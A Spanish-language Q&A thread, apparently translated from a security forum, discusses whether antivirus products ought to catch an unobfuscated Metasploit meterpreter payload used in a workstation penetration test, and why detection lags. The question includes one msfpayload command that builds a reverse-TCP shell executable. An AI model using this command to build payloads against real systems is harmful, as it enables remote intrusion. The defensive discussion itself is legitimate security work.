¿El antivirus debe detectar las cargas útiles de metasploit?

6

Como parte de una prueba de lápiz de la estación de trabajo, copio una carga útil de metasploit simple en la estación de trabajo e intento ejecutarlo. Por lo general, esto está bloqueado por el software antivirus. Sin embargo, a veces no lo es (no nombraré a los infractores). El software AV se está ejecutando y detecta correctamente el EICAR, pero no detecta una carga útil de metasploit simple no codificada.

Mi instinto es que esto es un fallo del software AV y debería informarse como una vulnerabilidad. Sin embargo, me pregunté si este comportamiento podría, de hecho, pretenderse? ¿Existen argumentos legítimos de que "metasploit no es un virus"?

En este caso, la carga útil es windows / meterpreter / reverse_tcp codificado como un archivo exe, sin ofuscación. Generado usando este comando:

msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 X > payload.exe
    
pregunta paj28 30.01.2015 - 12:29
fuente

3 respuestas

2

La respuesta lógica es que sí, ya que Metasploit es en gran parte de código abierto, todos los AV deben detectar y bloquear los módulos generados por Metasploit si están haciendo su trabajo. Desafortunadamente, la realidad es que es increíblemente difícil detectar y bloquear realmente los códigos / ejecutables maliciosos incluso si se genera con un marco de código abierto como Metasploit. Mi opinión sobre el tema es simplemente que Metasploit tenía una nueva actualización y los proveedores de AV todavía no han creado firmas para las nuevas cargas útiles generadas.

Estas son algunas de las razones:

  1. Es una carrera de armamentos como mencionó TimC. Las compañías de AV encuentran formas de bloquear códigos maliciosos a través de firmas y detección heurística. Esto, a su vez, reduce la efectividad de los productos y herramientas diseñados para evitar el AV, por lo que se encuentran nuevas formas de evitarlo y se incorporan en los productos para evitarlos. Los desarrolladores y colaboradores de la comunidad de Metasploit entienden los productos AV muy bien y con las actualizaciones constantes, a menudo hay nuevas técnicas innovadoras que durante un período de tiempo evitarán la AV hasta que los proveedores vuelvan a ponerse al día.

  • Los defensores no comparten la información de manera efectiva y esto hace que lo que se detecte en un AV no pueda ser marcado por otro durante bastante tiempo, o nunca. Mientras que el trabajo avanza hacia un estándar ( enlace ), business is business y muchos vendedores tienen sus propios estándares de propiedad impiden efectivamente el intercambio de información. Una prueba realizada por los laboratorios de LastLine demostró cuánto tiempo pueden tardar los proveedores en lograr la detección de malware. TENGA EN CUENTA: utilizaron Virustotal para la prueba y esta NO es una prueba real, pero sí proporciona información interesante. Para obtener más información sobre el uso de VirusTotal para las pruebas, vea esto: enlace . Básicamente, se reduce a no tener la capacidad de usar todos los mecanismos de detección en el entorno VirusTotal.
  •   

    Sinembargo,mepreguntabasiestecomportamientopodría,dehecho,serintencional?¿Existenargumentoslegítimosdeque"metasploit no es un virus"?

    Ningún proveedor de AV estaría dispuesto a poner en lista blanca a Metasploit y estoy seguro de que lo clasificarían como un virus si pudieran. La prueba de esto es bastante simple, ¡intente instalar Metasploit en una máquina con AV en funcionamiento!

        
    respondido por el Joe 27.11.2015 - 15:09
    fuente
    2

    Es una carrera de armamentos. Los desarrolladores de metasploit quieren desarrollar complementos que derroten el antivirus. Los desarrolladores de antivirus quieren derrotar a los complementos metasploit.

    Ambos no pueden tener éxito, por lo que a veces el AV desplegará firmas que detectan todos los módulos de metasploit, a veces los desarrolladores de metasploit encontrarán una nueva forma de evadir AV.

    Usted pensaría que los proveedores de AV tenían la ventaja debido a que las metasploit son de código abierto, pero obviamente no en este caso.

        
    respondido por el TimC 30.01.2015 - 12:54
    fuente
    0

    Depende de la versión de metasploit que estés usando. En la versión pro de metasploit, puedes disfrutar de Dynamic Payloads que sin duda puede evadir el antivirus.

    Según Rapid7, las cargas dinámicas pueden:

    • Evade las 10 soluciones AV principales en más del 90% de los casos. ¡Ningún proveedor de AV detecta todas las opciones de carga útil de MSP!

    • Use correcciones de errores para hacer que las sesiones sean más estables que las sesiones normales de MSF

    • Codifique el tráfico al descargar la carga útil, lo que puede ayudar a evadir IPS

    Intente cargar la carga útil en Virus Total para verificar si otros antivirus detectan la carga útil o no. Si un buen número de antivirus considera su carga útil como virus, eso simplemente significa que su antivirus está desactualizado. Intente actualizar sus definiciones de virus o cambiar su antivirus.

        
    respondido por el Sanidhay 27.11.2015 - 09:32
    fuente

    Lea otras preguntas en las etiquetas